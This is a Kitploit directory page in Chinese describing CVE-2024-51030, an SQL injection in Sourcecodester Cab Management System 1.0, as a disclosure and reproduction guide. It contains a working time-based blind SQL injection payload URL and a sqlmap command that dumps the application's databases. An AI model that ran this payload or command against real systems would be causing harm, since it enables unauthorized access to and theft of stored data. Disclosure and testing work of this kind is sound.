Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-51030 | Kitploit
工具/GitHubGitHub/vighneshnair7/cve-2024-51030
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-51030

描述

Sourcecodester Cab Management System 1.0 的 manage_client.php 和 view_cab.php 中存在 SQL 注入漏洞,允许远程攻击者通过 id 参数执行任意 SQL 命令,从而导致未经授权的访问以及数据库中敏感数据的潜在泄露。

漏洞类型

SQL 注入

产品厂商

Sourcecodester

受影响产品代码库:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

受影响组件:

Sourcecodester Cab Management System v1.0 的 manage_client.php 和 view_cab.php 页面中的 id 参数存在 SQL 注入漏洞。

攻击向量:

  1. 在本地搭建应用程序,并使用默认提供的管理员凭据登录,您也可以使用低权限管理员用户(如 staff)登录。
  2. 然后在浏览器中访问以下 URL:http://localhost/cms/admin/?page=clients/manage_client&id=1
  3. 注入 SQL 载荷:修改 URL 中的 id 参数,加入基于布尔的盲注或基于时间的盲注 SQL 注入载荷:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  4. 观察应用程序响应:如果注入成功,页面加载时间应明显变长(5 秒),从而确认 id 参数存在 SQL 注入漏洞。
  5. 然后使用 SQLMap 工具进行进一步利用,并使用以下命令转储数据库:sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump

参考:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
下载工具